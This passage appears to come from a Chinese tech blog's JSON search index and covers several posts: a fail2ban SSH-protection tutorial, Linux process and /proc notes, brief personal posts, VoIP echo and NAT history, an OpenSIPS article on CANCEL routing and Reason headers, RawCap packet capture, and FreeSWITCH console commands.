\u0026lt;JAIL\u0026gt; get \u0026lt;JAIL\u0026gt; action \u0026lt;ACT\u0026gt; \u0026lt;PROPERTY\u0026gt; gets the value of \u0026lt;PROPERTY\u0026gt; for the action \u0026lt;ACT\u0026gt; for \u0026lt;JAIL\u0026gt; Report bugs to https://github.com/fail2ban/fail2ban/issues Report bugs to https://github.com/fail2ban/fail2ban/issues\n","permalink":"https://wdd.js.org/posts/2020/04/ih9pz2/","summary":"简介 如果你的主机在公网上有端口暴露出去,那么总会有一些不怀好意的家伙,会尝试通过各种方式攻击你的机器。常见的服务例如ssh, nginx都会有类似的威胁。\n手工将某个ip加入黑名单,这种操作太麻烦,而且效率低。而fail2ban就是一种自动化的解决方案。\nfail2ban工作原理 fail2ban的工作原理是监控某个日志文件,然后根据某些关键词,提取出攻击方的IP地址,然后将其加入到黑名单。\nfail2ban安装 yum install fail2ban -y # 如果找不到fail2ban包,就执行下面的命令 yum install epel-release # 安装fail2ban 完成后 systemctl enable fail2ban # 设置fail2ban开机启动 systemctl start fail2ban # 启动fail2ban systemctl status fail2ban # 查看fail2ban的运行状态 用fail2ban保护ssh fail2ban的配置文件位于/etc/fail2ban目录下。\n在该目录下建立一个文件 jail.local, 内容如下\nbantime 持续禁止多久 maxretry 最大多少次尝试 banaction 拦截后的操作 findtime 查找时间 看下下面的操作的意思是:监控sshd服务的最近10分钟的日志,如果某个ip在10分钟之内,有2次登录失败,就把这个ip加入黑名单, 24小时之后,这个ip才会被从黑名单中移除。\n[DEFAULT] bantime = 24h banaction = iptables-multiport maxretry = 2 findtime = 10m [sshd] enabled = true 然后重启fail2ban, systemctl restart fail2ban fail2ban提供管理工具fail2ban-client","title":"自动IP拦截工具fail2ban使用教程"},{"content":"思考题:当你用ssh登录到一个linux机器,并且执行了某个hello.sh之后,有哪些进程参与了该过程?\nlinux系统架构 kernel mode user mode 内核态和用户态的区别 什么是进程 进程是运行的程序 process 是对 processor 虚拟化,通过时间片 进程都有uid nginx访问某个目录,Permission denied\n进程都有pid $$ 进程都有父进程 准确来说,除了pid为0的进程之外,其他进程都有父进程 有时候,你用kill命令杀死了一个进程,但是立马你就发现这个进程又起来了。你就要看看,这个进程是不是有个非init进程的父进程。一般这个进程负责监控子进程,一旦子进程挂掉,就会去重新创建一个进程。所以你需要找到这个父进程的Id,先把父进程kill掉,然后在kill子进程。 进程是一棵树 #!/bin/bash echo \u0026#34;pid is $$\u0026#34; times=0 while true do sleep 2s; let times++; echo $times hello; done ➜ ~ pstree 24601 sshd─┬─3*[sshd───zsh] ├─sshd───zsh───pstree └─sshd───zsh───world.sh───sleep 进程都有生命周期 创建 销毁 进程都有状态 runing 进程占用CPU, 正在执行指令 ready 进程所有需要的资源都已经就绪,等待进入CPU执行 blocked 进程被某些事件阻断,例如IO。 进程的状态转移图\n进程都有打开的文件描述符 使用lsof命令,可以查看某个进程所打开的文件描述符\n/proc/pid/fd/目录下也有文件描述符\nlsof -c 进程名lsof -p 进程号lsof filename # 查看某个文件被哪个进程打开**\n[root@localhost ~]# lsof -c rtpproxy COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME rtpproxy 2073 root cwd DIR 253,0 4096 128 / rtpproxy 2073 root rtd DIR 253,0 4096 128 / rtpproxy 2073 root txt REG 253,0 933247 18295252 /usr/local/bin/rtpproxy rtpproxy 2073 root mem REG 253,0 2127336 33617010 /usr/lib64/libc-2.17.so rtpproxy 2073 root mem REG 253,0 44448 33617041 /usr/lib64/librt-2.17.so rtpproxy 2073 root mem REG 253,0 19776 34757658 /usr/lib64/libdl-2.17.so rtpproxy 2073 root mem REG 253,0 1139680 34757660 /usr/lib64/libm-2.17.so rtpproxy 2073 root mem REG 253,0 144792 33617035 /usr/lib64/libpthread-2.17.so rtpproxy 2073 root mem REG 253,0 164112 33595530 /usr/lib64/ld-2.17.so rtpproxy 2073 root 0u CHR 1,3 0t0 1028 /dev/null rtpproxy 2073 root 1u CHR 1,3 0t0 1028 /dev/null rtpproxy 2073 root 2u CHR 1,3 0t0 1028 /dev/null rtpproxy 2073 root 3u IPv4 17641 0t0 UDP 192.168.40.100:7890 rtpproxy 2073 root 4u unix 0xffff880079260000 0t0 17642 socket rtpproxy 2073 root 8u IPv4 72592335 0t0 UDP 192.168.40.100:25257 进程都有资源限制 /proc/pid/limits\n以rtpproxy为例子,rtpproxy的pid为2073, /proc/pid/limits文件记录进程的资源限制\n进程都有环境变量 /proc/pid/environ\n进程都有参数 /proc/pid/cmdline\nrtpproxy-A192.168.40.100-l192.168.40.100-sudp:192.168.40.1007890-F-m20000-M40000-L20000-dDBUG[root@localhost 2073]# 进程都有名字 /proc/2073/status\nName:\trtpproxy State:\tS (sleeping) Tgid:\t2073 Ngid:\t0 Pid:\t2073 PPid:\t1 TracerPid:\t0 Uid:\t0\t0\t0\t0 Gid:\t0\t0\t0\t0 进程皆有退出码 非0的退出码一般是异常退出 $? [root@localhost 2073]# cat \u0026#34;test\u0026#34; [root@localhost 2073]# echo $? 1 [root@localhost 2073]# echo $? 0 进程可以fork 孤儿进程 孤儿进程:一个父进程退出,而它的一个或多个子进程还在运行,那么那些子进程将成为孤儿进程。孤儿进程将被init进程(进程号为1)所收养,并由init进程对它们完成状态收集工作。\n僵尸进程 僵尸进程:一个进程使用fork创建子进程,如果子进程退出,而父进程并没有调用wait或waitpid获取子进程的状态信息,那么子进程的进程描述符仍然保存在系统中。这种进程称之为僵死进程。 僵尸进程占用进程描述符,无法释放,会导致系统无法正常的创建进程。\n\u0026gt; cat /proc/sys/kernel/pid_max 32768 进程间通信 进程之间的所有资源都是完全隔离的,所以进程之间如何通信呢?\n在liunx底层,有个套接字API\nSOCKET socket (int domain, int type, int protocol) domain 表示域,一般由两个值 AF_INET 即因特网 AF_LOCAL 用于同一台机器上的进程间通信 type 表示类型 SOCK_STREAM 提供可靠的、全双工、面向链接的字节流,一般就是TCP SOCK_DGRAM 提供不可靠、尽力而为的数据报服务,一般就是UDP SOCK_RAW 允许直接访问IP层原生的数据报 也就是说,进程间通信,实际上也是用的socket\n守护进程 守护进程一般是后台运行的进程,例如sshd, mysqld, dockerd等等,他们的特点就是他们的ppid是1, 也就是说,守护进程也是孤儿进程的一种。\nroot 9696 1 0 Oct06 ? 00:05:16 /usr/sbin/sshd -D idle进程与init进程 Linux下有3个特殊的进程**,idle进程(PID = 0), init进程(PID = 1)和kthreadd(PID = 2)**\nidle进程由系统自动创建, 运行在内核态。idle进程其pid=0,其前身是系统创建的第一个进程,也是唯一一个没有通过fork或者kernel_thread产生的进程。完成加载系统后,演变为进程调度、交换 init进程由idle通过kernel_thread创建,在内核空间完成初始化后, 加载init程序, 并最终用户空间。由0进程创建,完成系统的初始化. 是系统中所有其它用户进程的祖先进程 Linux中的所有进程都是有init进程创建并运行的。首先Linux内核启动,然后在用户空间中启动init进程,再启动其他系统进程。在系统启动完成完成后,init将变为守护进程监视系统其他进程。 kthreadd进程由idle通过kernel_thread创建,并始终运行在内核空间, 负责所有内核线程的调度和管理 参考:https://blog.csdn.net/gatieme/article/details/51484562\n线程 ps -m可以在进程之后显示线程。线程的tid也会占用一个/proc/tid目录,和进程的/proc/pid 目录没什么区别。\n只不过进程的Tgid(线程组Id)是自己的pid, 而其他线程的Tgid是主线程的pid。\nps -em -o pid,tid,command | grep rtpproxy -A10 2112 - rtpproxy -l 192.168.40.101 -s udp:192.168.40.101 7890 -F -m 20000 -M 40000 -L 20000 -d DBUG - 2112 - - 2113 - - 2114 - - 2115 - - 2116 - - 2117 - - 2118 - 进程与线程的区别 关于/proc目录 proc目录是一个虚拟的文件系统,实际上是内核的数据结构的映射。里面的大部分的文件都是只读的,只有少部分是可写的。\n关于进程运行时信息,都可以在这个目录找到。\n下面的链接详细的介绍了每个目录的作用。\nhttps://www.linux.com/news/discover-possibilities-proc-directory/\nhttps://www.tldp.org/LDP/sag/html/proc-fs.html\nhttp://man7.org/linux/man-pages/man5/proc.5.html\n思考\n如何获取某个执行进程的可执行文件的路径? proc目录下的文件有何特点? 以下的几个文件是比较重要的,着重说明一下。\ncmdline 执行参数 environ 环境变量 ** exe -\u0026gt; /usr/local/bin/rtpproxy 可执行文件位置** ** fd 文件描述符信息** ** limits 资源限制** oom killer机制:杀掉最胖的那个进程 oom_adj oom_score oom_score_adj status 状态信息 dr-xr-xr-x. 2 root root 0 Jan 14 15:56 attr -rw-r--r--. 1 root root 0 Jan 14 15:56 autogroup -r--------. 1 root root 0 Jan 14 15:56 auxv -r--r--r--. 1 root root 0 Nov 6 17:59 cgroup --w-------. 1 root root 0 Jan 14 15:56 clear_refs -r--r--r--. 1 root root 0 Nov 6 10:26 cmdline -rw-r--r--. 1 root root 0 Nov 6 17:59 comm -rw-r--r--. 1 root root 0 Jan 14 15:56 coredump_filter -r--r--r--. 1 root root 0 Jan 14 15:56 cpuset lrwxrwxrwx. 1 root root 0 Jan 14 15:56 cwd -\u0026gt; / -r--------. 1 root root 0 Jan 14 15:56 environ lrwxrwxrwx. 1 root root 0 Nov 6 17:59 exe -\u0026gt; /usr/local/bin/rtpproxy dr-x------. 2 root root 0 Jan 14 15:56 fd dr-x------. 2 root root 0 Jan 14 15:56 fdinfo -rw-r--r--. 1 root root 0 Jan 14 15:56 gid_map -r--------. 1 root root 0 Jan 14 15:56 io -r--r--r--. 1 root root 0 Jan 14 15:56 limits -rw-r--r--. 1 root root 0 Nov 6 17:59 loginuid dr-x------. 2 root root 0 Jan 14 15:56 map_files -r--r--r--. 1 root root 0 Jan 14 15:56 maps -rw-------. 1 root root 0 Jan 14 15:56 mem -r--r--r--. 1 root root 0 Jan 14 15:56 mountinfo -r--r--r--. 1 root root 0 Jan 14 15:56 mounts -r--------. 1 root root 0 Jan 14 15:56 mountstats dr-xr-xr-x. 5 root root 0 Jan 14 15:56 net dr-x--x--x. 2 root root 0 Jan 14 15:56 ns -r--r--r--. 1 root root 0 Jan 14 15:56 numa_maps -rw-r--r--. 1 root root 0 Jan 14 15:56 oom_adj -r--r--r--. 1 root root 0 Jan 14 15:56 oom_score -rw-r--r--. 1 root root 0 Jan 14 15:56 oom_score_adj -r--r--r--. 1 root root 0 Jan 14 15:56 pagemap -r--r--r--. 1 root root 0 Jan 14 15:56 personality -rw-r--r--. 1 root root 0 Jan 14 15:56 projid_map lrwxrwxrwx. 1 root root 0 Jan 14 15:56 root -\u0026gt; / -rw-r--r--. 1 root root 0 Jan 14 15:56 sched -r--r--r--. 1 root root 0 Nov 6 17:59 sessionid -rw-r--r--. 1 root root 0 Jan 14 15:56 setgroups -r--r--r--. 1 root root 0 Jan 14 15:56 smaps -r--r--r--. 1 root root 0 Jan 14 15:56 stack -r--r--r--. 1 root root 0 Jan 14 15:56 stat -r--r--r--. 1 root root 0 Jan 14 15:56 statm -r--r--r--. 1 root root 0 Nov 6 10:26 status -r--r--r--. 1 root root 0 Jan 14 15:56 syscall dr-xr-xr-x. 9 root root 0 Jan 14 15:56 task -r--r--r--. 1 root root 0 Jan 14 15:56 timers -rw-r--r--. 1 root root 0 Jan 14 15:56 uid_map -r--r--r--. 1 root root 0 Jan 14 15:56 wchan 工具简介 ps ps有三种风格的使用方式,我们一般使用前两种\nUnix风格 参数以-开头,如-a BSD风格,直接用参数 如a GUN风格,以\u0026ndash;开头 常用的有\nps -ef ps aux VSZ 虚拟内存,单位kb RSS 物理内存,单位kb ➜ 2112 ps -ef | head UID PID PPID C STIME TTY TIME CMD root 1 0 0 2018 ? 01:57:34 /usr/lib/systemd/systemd --system --deserialize 23 root 2 0 0 2018 ? 00:00:44 [kthreadd] root 3 2 0 2018 ? 00:05:44 [ksoftirqd/0] root 7 2 0 2018 ? 00:08:04 [migration/0] root 8 2 0 2018 ? 00:00:00 [rcu_bh] root 9 2 0 2018 ? 00:00:00 [rcuob/0] root 10 2 0 2018 ? 00:00:00 [rcuob/1] root 11 2 0 2018 ? 00:00:00 [rcuob/2] root 12 2 0 2018 ? 00:00:00 [rcuob/3] ➜ 2112 ps aux | head USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 193524 3572 ? Ss 2018 117:34 /usr/lib/systemd/systemd --system --deserialize 23 root 2 0.0 0.0 0 0 ? S 2018 0:44 [kthreadd] root 3 0.0 0.0 0 0 ? S 2018 5:44 [ksoftirqd/0] root 7 0.0 0.0 0 0 ? S 2018 8:04 [migration/0] root 8 0.0 0.0 0 0 ? S 2018 0:00 [rcu_bh] root 9 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/0] root 10 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/1] root 11 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/2] root 12 0.0 0.0 0 0 ? S 2018 0:00 [rcuob/3] ps 查看线程\n➜ 2118 ps -em -o pid,tid,command | grep rtpproxy -A 10 2112 - rtpproxy -l 192.168.40.101 -s udp:192.168.40.101 7890 -F -m 20000 -M 40000 -L 20000 -d DBUG - 2112 - - 2113 - - 2114 - - 2115 - - 2116 - - 2117 - - 2118 - cat /proc/2112/status Name:\trtpproxy State:\tS (sleeping) Tgid:\t2112 Ngid:\t0 Pid:\t2112 PPid:\t1 TracerPid:\t0 Uid:\t0\t0\t0\t0 Gid:\t0\t0\t0\t0 FDSize:\t16384 Groups:\t0 VmPeak:\t390896 kB VmSize:\t259824 kB VmLck:\t0 kB VmPin:\t0 kB VmHWM:\t121708 kB VmRSS:\t3532 kB VmData:\t246120 kB VmStk:\t136 kB VmExe:\t176 kB VmLib:\t3092 kB VmPTE:\t316 kB VmSwap:\t2272 kB Threads:\t7 SigQ:\t2/15086 SigPnd:\t0000000000000000 ShdPnd:\t0000000000000000 SigBlk:\t0000000000000000 SigIgn:\t0000000000001000 SigCgt:\t0000000187804a03 CapInh:\t0000000000000000 CapPrm:\t0000001fffffffff CapEff:\t0000001fffffffff CapBnd:\t0000001fffffffff Seccomp:\t0 Cpus_allowed:\tf Cpus_allowed_list:\t0-3 Mems_allowed:\t00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001 Mems_allowed_list:\t0 voluntary_ctxt_switches:\t259223710 nonvoluntary_ctxt_switches:\t2216 nestat netstat -nulp netstat -ntulp netstat -nap lsof Linux下所有信息都是文件,那么查看打开文件就比较重要了。 lisf open file, 查看打开的文件\nlsof -c processName 按照进程名查看 lsof -c pid 按照pid查看 lsof file 查看文件被哪些进程打开 losf -i:8080 查看8080被那个进程占用 top top 1 P M 参考 http://turnoff.us/geek/inside-the-linux-kernel/ 《How Linux Works》 《Operating Systems there easy pieces》 讲虚拟化、并发、持久化三块 《理解Unix进程》 《Linux Shell Script cookbook》 https://www.internalpointers.com/post/gentle-introduction-multithreading https://dev.to/rrampage/surviving-the-linux-oom-killer-2ki9 附件书籍 proc(5) - Linux manual page.pdfCommand Line Text Processing - Sundeep Agarwal.pdfHow Linux Works _ What Every Superuser Sho - Brian Ward(Author).pdfOperating Systems three easy pieces - Unknown.pdf[Sarath Lakshman] Linux Shell Scripting Co - Unknown.pdftcp_ipGao Xiao Bian Cheng __Gai Shan Wang - Unknown.pdf\n","permalink":"https://wdd.js.org/posts/2020/04/pbcbub/","summary":"思考题:当你用ssh登录到一个linux机器,并且执行了某个hello.sh之后,有哪些进程参与了该过程?\nlinux系统架构 kernel mode user mode 内核态和用户态的区别 什么是进程 进程是运行的程序 process 是对 processor 虚拟化,通过时间片 进程都有uid nginx访问某个目录,Permission denied\n进程都有pid $$ 进程都有父进程 准确来说,除了pid为0的进程之外,其他进程都有父进程 有时候,你用kill命令杀死了一个进程,但是立马你就发现这个进程又起来了。你就要看看,这个进程是不是有个非init进程的父进程。一般这个进程负责监控子进程,一旦子进程挂掉,就会去重新创建一个进程。所以你需要找到这个父进程的Id,先把父进程kill掉,然后在kill子进程。 进程是一棵树 #!/bin/bash echo \u0026#34;pid is $$\u0026#34; times=0 while true do sleep 2s; let times++; echo $times hello; done ➜ ~ pstree 24601 sshd─┬─3*[sshd───zsh] ├─sshd───zsh───pstree └─sshd───zsh───world.sh───sleep 进程都有生命周期 创建 销毁 进程都有状态 runing 进程占用CPU, 正在执行指令 ready 进程所有需要的资源都已经就绪,等待进入CPU执行 blocked 进程被某些事件阻断,例如IO。 进程的状态转移图\n进程都有打开的文件描述符 使用lsof命令,可以查看某个进程所打开的文件描述符\n/proc/pid/fd/目录下也有文件描述符\nlsof -c 进程名lsof -p 进程号lsof filename # 查看某个文件被哪个进程打开**\n[root@localhost ~]# lsof -c rtpproxy COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME rtpproxy 2073 root cwd DIR 253,0 4096 128 / rtpproxy 2073 root rtd DIR 253,0 4096 128 / rtpproxy 2073 root txt REG 253,0 933247 18295252 /usr/local/bin/rtpproxy rtpproxy 2073 root mem REG 253,0 2127336 33617010 /usr/lib64/libc-2.","title":"s"},{"content":"最近感觉提前步入老年生活,晚上九点睡觉,早上六点醒来。醒来之后打盹一会,等着按灭六点十分的闹钟。\n哎,又困了。😩😩😩😩😩😩\n","permalink":"https://wdd.js.org/posts/2020/04/ysx4gz/","summary":"最近感觉提前步入老年生活,晚上九点睡觉,早上六点醒来。醒来之后打盹一会,等着按灭六点十分的闹钟。\n哎,又困了。😩😩😩😩😩😩","title":"老年生活"},{"content":"最近需要招个前端开发,我更想让他向Nodejs方面发展。\n简历看的眼花,不知道为什么有那么多人都在简历上写吃苦难耐,难道做前端开发真的需要吃苦耐劳吗?\n我在NPM上没有找到能收邮件的包,找到了发邮件的包。\n我想找个能收邮件的包,自动收邮件,自动分析和过滤一些不想看的简历。\n","permalink":"https://wdd.js.org/posts/2020/04/oczker/","summary":"最近需要招个前端开发,我更想让他向Nodejs方面发展。\n简历看的眼花,不知道为什么有那么多人都在简历上写吃苦难耐,难道做前端开发真的需要吃苦耐劳吗?\n我在NPM上没有找到能收邮件的包,找到了发邮件的包。\n我想找个能收邮件的包,自动收邮件,自动分析和过滤一些不想看的简历。","title":"简历之吃苦耐劳"},{"content":" 回音现象 说话人能在麦克风中听到自己的说话声。\n回音的可能原因 有的开发,喜欢用分机打自己的号码,你分机和你的手机离得太近,自然回产生回音的。 参考资料 http://www.voiptroubleshooter.com/problems/echo.html https://www.lifewire.com/how-to-stop-producing-echo-3426515 https://www.voipmechanic.com/voip-top-5-complaints.htm https://getvoip.com/blog/2012/12/18/the-biggest-causes-behind-echo-in-voip/ https://blog.csdn.net/huoppo/article/details/6643066 ","permalink":"https://wdd.js.org/opensips/ch7/echo-back/","summary":" 回音现象 说话人能在麦克风中听到自己的说话声。\n回音的可能原因 有的开发,喜欢用分机打自己的号码,你分机和你的手机离得太近,自然回产生回音的。 参考资料 http://www.voiptroubleshooter.com/problems/echo.html https://www.lifewire.com/how-to-stop-producing-echo-3426515 https://www.voipmechanic.com/voip-top-5-complaints.htm https://getvoip.com/blog/2012/12/18/the-biggest-causes-behind-echo-in-voip/ https://blog.csdn.net/huoppo/article/details/6643066 ","title":"回音问题调研"},{"content":"设想一下,如果国家规定,给孩子起名字的时候,不能和已经使用过的活着的人名字相同,会发生什么事情?\n除非把名字起得越来越长,否则名字很快就不够用了。\n在 1993 年的时候,有人就遇到类似的问题,因为 IP 地址快被用完了。\n他们想出两个方案:\n短期方案:CIDR(Classless InterDomain Routing) 长期方案:开发新的具有更大地址空间的互联网协议。可以认为是目前的 IPv6 当然了长期方案不是一蹴而就的,短期方案才是解决眼前问题的方案。\na very small percentage of hosts in a stub domain are communicating outside of the domain at any given time\n短期的方案基于一个逻辑事实:在一个网络中,只有非常少的几个主机需要跟外部网络交流。也就是说,大部分的主机都在内部交流。那么内部交流的这些主机,实际上并不需要给设置公网 IP。(但是这个只是 1993 年的那个时期的事实)**可以类比于,班级内部之间的学生交流很多。班级与班级之间的交流,估计只有班长之间交流。\n参考 https://tools.ietf.org/html/rfc1631 https://tools.ietf.org/html/rfc1996 https://tools.ietf.org/html/rfc2663 https://tools.ietf.org/html/rfc2993 ","permalink":"https://wdd.js.org/opensips/ch1/story-of-nat/","summary":"设想一下,如果国家规定,给孩子起名字的时候,不能和已经使用过的活着的人名字相同,会发生什么事情?\n除非把名字起得越来越长,否则名字很快就不够用了。\n在 1993 年的时候,有人就遇到类似的问题,因为 IP 地址快被用完了。\n他们想出两个方案:\n短期方案:CIDR(Classless InterDomain Routing) 长期方案:开发新的具有更大地址空间的互联网协议。可以认为是目前的 IPv6 当然了长期方案不是一蹴而就的,短期方案才是解决眼前问题的方案。\na very small percentage of hosts in a stub domain are communicating outside of the domain at any given time\n短期的方案基于一个逻辑事实:在一个网络中,只有非常少的几个主机需要跟外部网络交流。也就是说,大部分的主机都在内部交流。那么内部交流的这些主机,实际上并不需要给设置公网 IP。(但是这个只是 1993 年的那个时期的事实)**可以类比于,班级内部之间的学生交流很多。班级与班级之间的交流,估计只有班长之间交流。\n参考 https://tools.ietf.org/html/rfc1631 https://tools.ietf.org/html/rfc1996 https://tools.ietf.org/html/rfc2663 https://tools.ietf.org/html/rfc2993 ","title":"漫话NAT的历史todo"},{"content":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nCall canceling may look like a trivial mechanism, but it plays an important role in complex scenarios like simultaneous ringing (parallel forking), call pickup, call redirect and many others. So, aside proper routing of CANCEL requests, reporting the right cancelling reason is equally important.\n如何正确的处理cancel请求? According to RFC 3261,** a CANCEL must be route to the exact same destination (IP, port, protocol) and with the same exact Request-URI as the INVITE it is canceling**. This is required in order to guarantee that the CANCEL will end up (via the same SIP route) in the same place as the INVITE.So, the CANCEL must follow up the INVITE. But how to do and script this?\nIf you run OpenSIPS in a stateless mode, there is no other way then taking care of this at script level – apply the same dialplan and routing decisions for the CANCEL as you did for the INVITE. As stateless proxies usually have simple logic, this is not something difficult to do.\nBut what if the routing logic is complex, involving factors that make it hard to reproduce when handling the CANCEL? For example, the INVITE routing may depend on time conditions or dynamic data (that may change at any time).\nIn such cases, you must rely on a stateful routing (SIP transaction based). Basically the transaction engine in OpenSIPS will store and remember the information on where and how the INVITE was routed, so there is not need to “reproduce” that for the CANCEL request – you just fetch it from the transaction context. So, all the heavy lifting is done by the TM (transaction) module – you just have to invoke it:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { t_relay(); exit; } As you can see, there is no need to do any explicit routing for CANCEL requests – you just ask TM module to do it for you – as soon as the module sees you try to route a CANCEL,** it will automatically fetch the needed information from the INVITE transaction and set the proper routing **– all this magic happens inside the t_relay() function.\nNow, OpenSIPS is a multi-process application and INVITE requests may take time to be routed (due complex logic involving external queries or I/Os like DB, REST or others). So, you may end up with OpenSIPS handing the INVITE request in one process (for some time) while the corresponding CANCEL request starts being handled in another process. This may lead to some race conditions – if the INVITE is not yet processed and routed out, how will OpenSIPS know what to do with the CANCEL??\n多进程模式下的INVITE和CANCEL可能会导致条件竞争\nWell, if you cannot solve a race condition, better avoid it :). How? Postpone the CANCEL processing until the INVITE is done and routed. How? If there is no transaction created yet for the INVITE, avoid handling the CANCEL by simply dropping it – no worries, we will not lose the CANCEL as by dropping it, we will force the caller device to resend it over again.\nSo, we enhance our CANCEL scripting by checking for the INVITE transaction – this can be done via the t_check_trans() function. If we do not find the INVITE transaction, simple exit to drop the CANCEL request:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) t_relay(); exit; } 如何控制CANCEL请求Reason头? Propagating a correct Reason info in the CANCEL requests is equally important. For example, depending on the Reason for the canceled incoming call, a callee device may report it as a missed call (if the Reason header indicates a caller cancelling) or not (if the Reason header indicates that the call has established somewhere else, due to parallel forking).\nSo, you need to pay attention to propagating or inserting the Reason info into the CANCEL requests!For CANCEL requests built by OpenSIPS , the Reason header is inserted all the time, in order to reflect the reason for generating the CANCEL:\nSIP;cause=480;text=”NO_ANSWER” – if the cancelling was a result of an INVITE timeout; SIP;cause=200;text=”Call completed elsewhere” – if the cancelling was due to parallel forking (another branch of the call was answered); SIP;cause=487;text=”ORIGINATOR_CANCEL” – if the cancelling was received from a previous SIP hop (due an incoming CANCEL). So,** by default, OpenSIPS will discard the Reason info for the CANCEL requests that are received and relayed further** (and force the “ORIGINATOR_CANCEL” reason). But there are many cases when you want to keep and propagate further the incoming Reason header. To do that, you need to set the “0x08” flag when calling the t_relay() function for the CANCEL:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) # preserve the received Reason header t_relay(\u0026#34;8\u0026#34;); exit; } If there is no Reason in the incoming CANCEL, the default one will be inserted by OpenSIPS in the outgoing CANCEL.Even more, starting with the 2.3 version, OpenSIPS allows you to inject your own Reason header, by using the t_add_cancel_reason() function:\nif ( is_method(\u0026#34;CANCEL\u0026#34;) ) { if ( t_check_trans() ) { t_add_cancel_reason(\u0026#39;Reason: SIP ;cause=200;text=\u0026#34;Call completed elsewhere\u0026#34;\\r\\n\u0026#39;); t_relay(); } exit; } This function gives you full control over the Reason header and allows various implementation of complex scenarios, especially SBC and front-end like.\n","permalink":"https://wdd.js.org/opensips/blog/cancel-reason/","summary":"原文:https://blog.opensips.org/2016/12/29/understanding-and-dimensioning-memory-in-opensips/\nCall canceling may look like a trivial mechanism, but it plays an important role in complex scenarios like simultaneous ringing (parallel forking), call pickup, call redirect and many others. So, aside proper routing of CANCEL requests, reporting the right cancelling reason is equally important.\n如何正确的处理cancel请求? According to RFC 3261,** a CANCEL must be route to the exact same destination (IP, port, protocol) and with the same exact Request-URI as the INVITE it is canceling**.","title":"CANCEL请求和Reason头"},{"content":"相比于wireshark, RawCap非常小,仅有48kb。\n使用RawCap命令需要使用管理员权限打开CMD,然后进入到RawCap.exe的目录。例如F:\\Tools\n显示网卡列表 输入RawCap.exe \u0026ndash;help, 可以显示命令的使用帮助、网卡列表还有使用例子。\nF:\\Tools\u0026gt;RawCap.exe --help NETRESEC RawCap version 0.2.0.0 Usage: RawCap.exe [OPTIONS] \u0026lt;interface\u0026gt; \u0026lt;pcap_target\u0026gt; \u0026lt;interface\u0026gt; can be an interface number or IP address \u0026lt;pcap_target\u0026gt; can be filename, stdout (-) or named pipe (starting with \\\\.\\pipe\\) OPTIONS: -f Flush data to file after each packet (no buffer) -c \u0026lt;count\u0026gt; Stop sniffing after receiving \u0026lt;count\u0026gt; packets -s \u0026lt;sec\u0026gt; Stop sniffing after \u0026lt;sec\u0026gt; seconds -m Disable automatic creation of RawCap firewall entry -q Quiet, don\u0026#39;t print packet count to standard out INTERFACES: 0. IP : 169.254.63.243 NIC Name : Local Area Connection NIC Type : Ethernet 1. IP : 192.168.1.129 NIC Name : WiFi NIC Type : Wireless80211 2. IP : 127.0.0.1 NIC Name : Loopback Pseudo-Interface 1 NIC Type : Loopback 3. IP : 10.165.240.132 NIC Name : Mobile 12 NIC Type : Wwanpp Example 1: RawCap.exe 0 dumpfile.pcap Example 2: RawCap.exe -s 60 127.0.0.1 localhost.pcap Example 3: RawCap.exe 127.0.0.1 \\\\.\\pipe\\RawCap Example 4: RawCap.exe -q 127.0.0.1 - | Wireshark.exe -i - -k :::warning 注意:\n执行RawCap.exe的时候,不要用 ./RawCap.exe , 直接用文件名 RawCap.exe 加执行参数 RawCap的功能很弱,没有包过滤。只能指定网卡抓包,然后保存为文件。 ::: 抓指定网卡的包 Example 1: RawCap.exe 0 dumpfile.pcap Example 2: RawCap.exe -s 60 127.0.0.1 localhost.pcap Example 3: RawCap.exe 127.0.0.1 \\\\.\\pipe\\RawCap Example 4: RawCap.exe -q 127.0.0.1 - | Wireshark.exe -i - -k 参考 https://www.netresec.com/?page=RawCap\n附件 附件中有两个版本的rawcap文件。\nraw-cap.zip ","permalink":"https://wdd.js.org/posts/2020/04/pfkelh/","summary":"相比于wireshark, RawCap非常小,仅有48kb。\n使用RawCap命令需要使用管理员权限打开CMD,然后进入到RawCap.exe的目录。例如F:\\Tools\n显示网卡列表 输入RawCap.exe \u0026ndash;help, 可以显示命令的使用帮助、网卡列表还有使用例子。\nF:\\Tools\u0026gt;RawCap.exe --help NETRESEC RawCap version 0.2.0.0 Usage: RawCap.exe [OPTIONS] \u0026lt;interface\u0026gt; \u0026lt;pcap_target\u0026gt; \u0026lt;interface\u0026gt; can be an interface number or IP address \u0026lt;pcap_target\u0026gt; can be filename, stdout (-) or named pipe (starting with \\\\.\\pipe\\) OPTIONS: -f Flush data to file after each packet (no buffer) -c \u0026lt;count\u0026gt; Stop sniffing after receiving \u0026lt;count\u0026gt; packets -s \u0026lt;sec\u0026gt; Stop sniffing after \u0026lt;sec\u0026gt; seconds -m Disable automatic creation of RawCap firewall entry -q Quiet, don\u0026#39;t print packet count to standard out INTERFACES: 0.","title":"window轻量级抓包工具RawCap介绍"},{"content":"\n1. 设置日志级别 每个快捷键对应一个功能,具体配置位于 /conf/autoload_configs/switch.conf.xml\nF1. help F2. status F3. show channels F4. show calls F5. sofia status F6. reloadxml F7. console loglevel 0 F8. console loglevel 7 F9. sofia status profile internal F10. sofia profile intrenal siptrace on F11. sofia profile internal siptrace off F12. version 2. 发起呼叫相关 下面的命令都是同步的命令,可以在所有命令前加bgapi命令,让originate命令后台异步执行。\n2.1 回音测试 originate user/1000 \u0026amp;echo 2.2 停泊 originate user/1000 \u0026amp;park # 停泊 2.3 保持 originate user/1000 \u0026amp;hold # 保持 2.4 播放放音 originate user/1000 \u0026amp;playback(/root/welclome.wav) # 播放音乐 2.5 呼叫并录音 originate user/1000 \u0026amp;record(/tmp/vocie_of_alice.wav) # 呼叫并录音 2.6 同振与顺振 